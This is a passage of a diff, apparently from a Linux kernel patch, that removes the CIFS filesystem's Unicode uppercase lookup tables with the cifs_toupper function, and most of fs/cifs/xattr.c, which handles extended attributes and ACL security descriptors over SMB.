+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0xa640, 0x0000, 0xa642, 0x0000, 0xa644, 0x0000, 0xa646,
+-	0x0000, 0xa648, 0x0000, 0xa64a, 0x0000, 0xa64c, 0x0000, 0xa64e,
+-	0x0000, 0xa650, 0x0000, 0xa652, 0x0000, 0xa654, 0x0000, 0xa656,
+-	0x0000, 0xa658, 0x0000, 0xa65a, 0x0000, 0xa65c, 0x0000, 0xa65e,
+-	0x0000, 0x0000, 0x0000, 0xa662, 0x0000, 0xa664, 0x0000, 0xa666,
+-	0x0000, 0xa668, 0x0000, 0xa66a, 0x0000, 0xa66c, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0xa680, 0x0000, 0xa682, 0x0000, 0xa684, 0x0000, 0xa686,
+-	0x0000, 0xa688, 0x0000, 0xa68a, 0x0000, 0xa68c, 0x0000, 0xa68e,
+-	0x0000, 0xa690, 0x0000, 0xa692, 0x0000, 0xa694, 0x0000, 0xa696,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_a7[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0xa722, 0x0000, 0xa724, 0x0000, 0xa726,
+-	0x0000, 0xa728, 0x0000, 0xa72a, 0x0000, 0xa72c, 0x0000, 0xa72e,
+-	0x0000, 0x0000, 0x0000, 0xa732, 0x0000, 0xa734, 0x0000, 0xa736,
+-	0x0000, 0xa738, 0x0000, 0xa73a, 0x0000, 0xa73c, 0x0000, 0xa73e,
+-	0x0000, 0xa740, 0x0000, 0xa742, 0x0000, 0xa744, 0x0000, 0xa746,
+-	0x0000, 0xa748, 0x0000, 0xa74a, 0x0000, 0xa74c, 0x0000, 0xa74e,
+-	0x0000, 0xa750, 0x0000, 0xa752, 0x0000, 0xa754, 0x0000, 0xa756,
+-	0x0000, 0xa758, 0x0000, 0xa75a, 0x0000, 0xa75c, 0x0000, 0xa75e,
+-	0x0000, 0xa760, 0x0000, 0xa762, 0x0000, 0xa764, 0x0000, 0xa766,
+-	0x0000, 0xa768, 0x0000, 0xa76a, 0x0000, 0xa76c, 0x0000, 0xa76e,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0xa779, 0x0000, 0xa77b, 0x0000, 0x0000, 0xa77e,
+-	0x0000, 0xa780, 0x0000, 0xa782, 0x0000, 0xa784, 0x0000, 0xa786,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0xa78b, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_ff[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0xff21, 0xff22, 0xff23, 0xff24, 0xff25, 0xff26, 0xff27,
+-	0xff28, 0xff29, 0xff2a, 0xff2b, 0xff2c, 0xff2d, 0xff2e, 0xff2f,
+-	0xff30, 0xff31, 0xff32, 0xff33, 0xff34, 0xff35, 0xff36, 0xff37,
+-	0xff38, 0xff39, 0xff3a, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t *const toplevel[256] = {
+-	t2_00, t2_01, t2_02, t2_03, t2_04, t2_05,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL, t2_1d, t2_1e, t2_1f,
+-	NULL, t2_21,  NULL,  NULL, t2_24,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL, t2_2c, t2_2d,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL, t2_a6, t2_a7,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
+-	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL, t2_ff,
+-};
+-
+-/**
+- * cifs_toupper - convert a wchar_t from lower to uppercase
+- * @in: character to convert from lower to uppercase
+- *
+- * This function consults the static tables above to convert a wchar_t from
+- * lower to uppercase. In the event that there is no mapping, the original
+- * "in" character is returned.
+- */
+-wchar_t
+-cifs_toupper(wchar_t in)
+-{
+-	unsigned char idx;
+-	const wchar_t *tbl;
+-	wchar_t out;
+-
+-	/* grab upper byte */
+-	idx = (in & 0xff00) >> 8;
+-
+-	/* find pointer to 2nd layer table */
+-	tbl = toplevel[idx];
+-	if (!tbl)
+-		return in;
+-
+-	/* grab lower byte */
+-	idx = in & 0xff;
+-
+-	/* look up character in table */
+-	out = tbl[idx];
+-	if (out)
+-		return out;
+-
+-	return in;
+-}
+diff --git a/fs/cifs/xattr.c b/fs/cifs/xattr.c
+deleted file mode 100644
+index 998fa51f9b684..0000000000000
+--- a/fs/cifs/xattr.c
++++ /dev/null
+@@ -1,555 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2003, 2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/posix_acl_xattr.h>
+-#include <linux/slab.h>
+-#include <linux/xattr.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "cifs_ioctl.h"
+-
+-#define MAX_EA_VALUE_SIZE CIFSMaxBufSize
+-#define CIFS_XATTR_CIFS_ACL "system.cifs_acl" /* DACL only */
+-#define CIFS_XATTR_CIFS_NTSD "system.cifs_ntsd" /* owner plus DACL */
+-#define CIFS_XATTR_CIFS_NTSD_FULL "system.cifs_ntsd_full" /* owner/DACL/SACL */
+-#define CIFS_XATTR_ATTRIB "cifs.dosattrib"  /* full name: user.cifs.dosattrib */
+-#define CIFS_XATTR_CREATETIME "cifs.creationtime"  /* user.cifs.creationtime */
+-/*
+- * Although these three are just aliases for the above, need to move away from
+- * confusing users and using the 20+ year old term 'cifs' when it is no longer
+- * secure, replaced by SMB2 (then even more highly secure SMB3) many years ago
+- */
+-#define SMB3_XATTR_CIFS_ACL "system.smb3_acl" /* DACL only */
+-#define SMB3_XATTR_CIFS_NTSD "system.smb3_ntsd" /* owner plus DACL */
+-#define SMB3_XATTR_CIFS_NTSD_FULL "system.smb3_ntsd_full" /* owner/DACL/SACL */
+-#define SMB3_XATTR_ATTRIB "smb3.dosattrib"  /* full name: user.smb3.dosattrib */
+-#define SMB3_XATTR_CREATETIME "smb3.creationtime"  /* user.smb3.creationtime */
+-/* BB need to add server (Samba e.g) support for security and trusted prefix */
+-
+-enum { XATTR_USER, XATTR_CIFS_ACL, XATTR_ACL_ACCESS, XATTR_ACL_DEFAULT,
+-	XATTR_CIFS_NTSD, XATTR_CIFS_NTSD_FULL };
+-
+-static int cifs_attrib_set(unsigned int xid, struct cifs_tcon *pTcon,
+-			   struct inode *inode, const char *full_path,
+-			   const void *value, size_t size)
+-{
+-	ssize_t rc = -EOPNOTSUPP;
+-	__u32 *pattrib = (__u32 *)value;
+-	__u32 attrib;
+-	FILE_BASIC_INFO info_buf;
+-
+-	if ((value == NULL) || (size != sizeof(__u32)))
+-		return -ERANGE;
+-
+-	memset(&info_buf, 0, sizeof(info_buf));
+-	attrib = *pattrib;
+-	info_buf.Attributes = cpu_to_le32(attrib);
+-	if (pTcon->ses->server->ops->set_file_info)
+-		rc = pTcon->ses->server->ops->set_file_info(inode, full_path,
+-				&info_buf, xid);
+-	if (rc == 0)
+-		CIFS_I(inode)->cifsAttrs = attrib;
+-
+-	return rc;
+-}
+-
+-static int cifs_creation_time_set(unsigned int xid, struct cifs_tcon *pTcon,
+-				  struct inode *inode, const char *full_path,
+-				  const void *value, size_t size)
+-{
+-	ssize_t rc = -EOPNOTSUPP;
+-	__u64 *pcreation_time = (__u64 *)value;
+-	__u64 creation_time;
+-	FILE_BASIC_INFO info_buf;
+-
+-	if ((value == NULL) || (size != sizeof(__u64)))
+-		return -ERANGE;
+-
+-	memset(&info_buf, 0, sizeof(info_buf));
+-	creation_time = *pcreation_time;
+-	info_buf.CreationTime = cpu_to_le64(creation_time);
+-	if (pTcon->ses->server->ops->set_file_info)
+-		rc = pTcon->ses->server->ops->set_file_info(inode, full_path,
+-				&info_buf, xid);
+-	if (rc == 0)
+-		CIFS_I(inode)->createtime = creation_time;
+-
+-	return rc;
+-}
+-
+-static int cifs_xattr_set(const struct xattr_handler *handler,
+-			  struct user_namespace *mnt_userns,
+-			  struct dentry *dentry, struct inode *inode,
+-			  const char *name, const void *value,
+-			  size_t size, int flags)
+-{
+-	int rc = -EOPNOTSUPP;
+-	unsigned int xid;
+-	struct super_block *sb = dentry->d_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *pTcon;
+-	const char *full_path;
+-	void *page;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	pTcon = tlink_tcon(tlink);
+-
+-	xid = get_xid();
+-	page = alloc_dentry_path();
+-
+-	full_path = build_path_from_dentry(dentry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto out;
+-	}
+-	/* return dos attributes as pseudo xattr */
+-	/* return alt name if available as pseudo attr */
+-
+-	/* if proc/fs/cifs/streamstoxattr is set then
+-		search server for EAs or streams to
+-		returns as xattrs */
+-	if (size > MAX_EA_VALUE_SIZE) {
+-		cifs_dbg(FYI, "size of EA value too large\n");
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	switch (handler->flags) {
+-	case XATTR_USER:
+-		cifs_dbg(FYI, "%s:setting user xattr %s\n", __func__, name);
+-		if ((strcmp(name, CIFS_XATTR_ATTRIB) == 0) ||
+-		    (strcmp(name, SMB3_XATTR_ATTRIB) == 0)) {
+-			rc = cifs_attrib_set(xid, pTcon, inode, full_path,
+-					value, size);
+-			if (rc == 0) /* force revalidate of the inode */
+-				CIFS_I(inode)->time = 0;
+-			break;
+-		} else if ((strcmp(name, CIFS_XATTR_CREATETIME) == 0) ||
+-			   (strcmp(name, SMB3_XATTR_CREATETIME) == 0)) {
+-			rc = cifs_creation_time_set(xid, pTcon, inode,
+-					full_path, value, size);
+-			if (rc == 0) /* force revalidate of the inode */
+-				CIFS_I(inode)->time = 0;
+-			break;
+-		}
+-
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
+-			goto out;
+-
+-		if (pTcon->ses->server->ops->set_EA)
+-			rc = pTcon->ses->server->ops->set_EA(xid, pTcon,
+-				full_path, name, value, (__u16)size,
+-				cifs_sb->local_nls, cifs_sb);
+-		break;
+-
+-	case XATTR_CIFS_ACL:
+-	case XATTR_CIFS_NTSD:
+-	case XATTR_CIFS_NTSD_FULL: {
+-		struct cifs_ntsd *pacl;
+-
+-		if (!value)
+-			goto out;
+-		pacl = kmalloc(size, GFP_KERNEL);
+-		if (!pacl) {
+-			rc = -ENOMEM;
+-		} else {
+-			memcpy(pacl, value, size);
+-			if (pTcon->ses->server->ops->set_acl) {
+-				int aclflags = 0;
+-				rc = 0;
+-
+-				switch (handler->flags) {
+-				case XATTR_CIFS_NTSD_FULL:
+-					aclflags = (CIFS_ACL_OWNER |
+-						    CIFS_ACL_GROUP |
+-						    CIFS_ACL_DACL |
+-						    CIFS_ACL_SACL);
+-					break;
+-				case XATTR_CIFS_NTSD:
+-					aclflags = (CIFS_ACL_OWNER |
+-						    CIFS_ACL_GROUP |
+-						    CIFS_ACL_DACL);
+-					break;
+-				case XATTR_CIFS_ACL:
+-				default:
+-					aclflags = CIFS_ACL_DACL;
+-				}
+-
+-				rc = pTcon->ses->server->ops->set_acl(pacl,
+-					size, inode, full_path, aclflags);
+-			} else {
+-				rc = -EOPNOTSUPP;
+-			}
+-			if (rc == 0) /* force revalidate of the inode */
+-				CIFS_I(inode)->time = 0;
+-			kfree(pacl);
+-		}
+-		break;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	case XATTR_ACL_ACCESS:
+-#ifdef CONFIG_CIFS_POSIX
+-		if (!value)
+-			goto out;
+-		if (sb->s_flags & SB_POSIXACL)
+-			rc = CIFSSMBSetPosixACL(xid, pTcon, full_path,
+-				value, (const int)size,
+-				ACL_TYPE_ACCESS, cifs_sb->local_nls,
+-				cifs_remap(cifs_sb));
+-#endif  /* CONFIG_CIFS_POSIX */
+-		break;
+-
+-	case XATTR_ACL_DEFAULT:
+-#ifdef CONFIG_CIFS_POSIX
+-		if (!value)
+-			goto out;
+-		if (sb->s_flags & SB_POSIXACL)
+-			rc = CIFSSMBSetPosixACL(xid, pTcon, full_path,
+-				value, (const int)size,
+-				ACL_TYPE_DEFAULT, cifs_sb->local_nls,
+-				cifs_remap(cifs_sb));
+-#endif  /* CONFIG_CIFS_POSIX */
+-		break;
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	}
+-
+-out:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-static int cifs_attrib_get(struct dentry *dentry,
+-			   struct inode *inode, void *value,
+-			   size_t size)
+-{
+-	ssize_t rc;
+-	__u32 *pattribute;
+-
+-	rc = cifs_revalidate_dentry_attr(dentry);
+-
+-	if (rc)
+-		return rc;
+-
+-	if ((value == NULL) || (size == 0))
+-		return sizeof(__u32);
+-	else if (size < sizeof(__u32))
+-		return -ERANGE;
+-
+-	/* return dos attributes as pseudo xattr */
+-	pattribute = (__u32 *)value;
+-	*pattribute = CIFS_I(inode)->cifsAttrs;
+-
+-	return sizeof(__u32);
+-}
+-
+-static int cifs_creation_time_get(struct dentry *dentry, struct inode *inode,
+-				  void *value, size_t size)
+-{
+-	ssize_t rc;
+-	__u64 *pcreatetime;
+-
+-	rc = cifs_revalidate_dentry_attr(dentry);
+-	if (rc)
+-		return rc;
+-
+-	if ((value == NULL) || (size == 0))
+-		return sizeof(__u64);
+-	else if (size < sizeof(__u64))
+-		return -ERANGE;
+-
+-	/* return dos attributes as pseudo xattr */
+-	pcreatetime = (__u64 *)value;
+-	*pcreatetime = CIFS_I(inode)->createtime;
+-	return sizeof(__u64);
+-}
+-
+-
+-static int cifs_xattr_get(const struct xattr_handler *handler,
+-			  struct dentry *dentry, struct inode *inode,
+-			  const char *name, void *value, size_t size)
+-{
+-	ssize_t rc = -EOPNOTSUPP;
+-	unsigned int xid;
+-	struct super_block *sb = dentry->d_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *pTcon;
+-	const char *full_path;
+-	void *page;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	pTcon = tlink_tcon(tlink);
+-
+-	xid = get_xid();
+-	page = alloc_dentry_path();
+-
+-	full_path = build_path_from_dentry(dentry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto out;
+-	}
+-
+-	/* return alt name if available as pseudo attr */
+-	switch (handler->flags) {
+-	case XATTR_USER:
+-		cifs_dbg(FYI, "%s:querying user xattr %s\n", __func__, name);
+-		if ((strcmp(name, CIFS_XATTR_ATTRIB) == 0) ||
+-		    (strcmp(name, SMB3_XATTR_ATTRIB) == 0)) {
+-			rc = cifs_attrib_get(dentry, inode, value, size);
+-			break;
+-		} else if ((strcmp(name, CIFS_XATTR_CREATETIME) == 0) ||
+-		    (strcmp(name, SMB3_XATTR_CREATETIME) == 0)) {
+-			rc = cifs_creation_time_get(dentry, inode, value, size);
+-			break;
+-		}
+-
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
+-			goto out;
+-
+-		if (pTcon->ses->server->ops->query_all_EAs)
+-			rc = pTcon->ses->server->ops->query_all_EAs(xid, pTcon,
+-				full_path, name, value, size, cifs_sb);
+-		break;
+-
+-	case XATTR_CIFS_ACL:
+-	case XATTR_CIFS_NTSD:
+-	case XATTR_CIFS_NTSD_FULL: {
+-		/*
+-		 * fetch owner, DACL, and SACL if asked for full descriptor,
+-		 * fetch owner and DACL otherwise
+-		 */
+-		u32 acllen, extra_info;
+-		struct cifs_ntsd *pacl;
+-
+-		if (pTcon->ses->server->ops->get_acl == NULL)
+-			goto out; /* rc already EOPNOTSUPP */
+-
+-		if (handler->flags == XATTR_CIFS_NTSD_FULL) {
+-			extra_info = SACL_SECINFO;
+-		} else {
+-			extra_info = 0;
+-		}
+-		pacl = pTcon->ses->server->ops->get_acl(cifs_sb,
+-				inode, full_path, &acllen, extra_info);
+-		if (IS_ERR(pacl)) {
+-			rc = PTR_ERR(pacl);
+-			cifs_dbg(VFS, "%s: error %zd getting sec desc\n",
+-				 __func__, rc);
+-		} else {
+-			if (value) {
+-				if (acllen > size)
+-					acllen = -ERANGE;
+-				else
+-					memcpy(value, pacl, acllen);
+-			}
+-			rc = acllen;
+-			kfree(pacl);
+-		}
+-		break;
+-	}
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	case XATTR_ACL_ACCESS:
+-#ifdef CONFIG_CIFS_POSIX
+-		if (sb->s_flags & SB_POSIXACL)
+-			rc = CIFSSMBGetPosixACL(xid, pTcon, full_path,
+-				value, size, ACL_TYPE_ACCESS,
+-				cifs_sb->local_nls,
+-				cifs_remap(cifs_sb));
+-#endif  /* CONFIG_CIFS_POSIX */
+-		break;
+-
+-	case XATTR_ACL_DEFAULT:
+-#ifdef CONFIG_CIFS_POSIX
+-		if (sb->s_flags & SB_POSIXACL)
+-			rc = CIFSSMBGetPosixACL(xid, pTcon, full_path,
+-				value, size, ACL_TYPE_DEFAULT,
+-				cifs_sb->local_nls,
+-				cifs_remap(cifs_sb));
+-#endif  /* CONFIG_CIFS_POSIX */
+-		break;
+-#endif /* ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	}
+-
+-	/* We could add an additional check for streams ie
+-	    if proc/fs/cifs/streamstoxattr is set then
+-		search server for EAs or streams to
+-		returns as xattrs */
+-
+-	if (rc == -EINVAL)
+-		rc = -EOPNOTSUPP;
+-
+-out:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-ssize_t cifs_listxattr(struct dentry *direntry, char *data, size_t buf_size)
+-{
+-	ssize_t rc = -EOPNOTSUPP;
+-	unsigned int xid;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *pTcon;
+-	const char *full_path;
+-	void *page;
+-
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
+-		return -EOPNOTSUPP;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	pTcon = tlink_tcon(tlink);
+-
+-	xid = get_xid();
+-	page = alloc_dentry_path();
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto list_ea_exit;
+-	}
+-	/* return dos attributes as pseudo xattr */
+-	/* return alt name if available as pseudo attr */
+-
+-	/* if proc/fs/cifs/streamstoxattr is set then
+-		search server for EAs or streams to
+-		returns as xattrs */
+-
+-	if (pTcon->ses->server->ops->query_all_EAs)
+-		rc = pTcon->ses->server->ops->query_all_EAs(xid, pTcon,
+-				full_path, NULL, data, buf_size, cifs_sb);
+-list_ea_exit:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-static const struct xattr_handler cifs_user_xattr_handler = {
+-	.prefix = XATTR_USER_PREFIX,
+-	.flags = XATTR_USER,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-/* os2.* attributes are treated like user.* attributes */
+-static const struct xattr_handler cifs_os2_xattr_handler = {
+-	.prefix = XATTR_OS2_PREFIX,
+-	.flags = XATTR_USER,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-static const struct xattr_handler cifs_cifs_acl_xattr_handler = {
+-	.name = CIFS_XATTR_CIFS_ACL,
+-	.flags = XATTR_CIFS_ACL,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-/*
+- * Although this is just an alias for the above, need to move away from
+- * confusing users and using the 20 year old term 'cifs' when it is no
+- * longer secure and was replaced by SMB2/SMB3 a long time ago, and
+- * SMB3 and later are highly secure.
+- */
+-static const struct xattr_handler smb3_acl_xattr_handler = {
+-	.name = SMB3_XATTR_CIFS_ACL,
+-	.flags = XATTR_CIFS_ACL,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-static const struct xattr_handler cifs_cifs_ntsd_xattr_handler = {
+-	.name = CIFS_XATTR_CIFS_NTSD,
+-	.flags = XATTR_CIFS_NTSD,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-/*
+- * Although this is just an alias for the above, need to move away from
+- * confusing users and using the 20 year old term 'cifs' when it is no
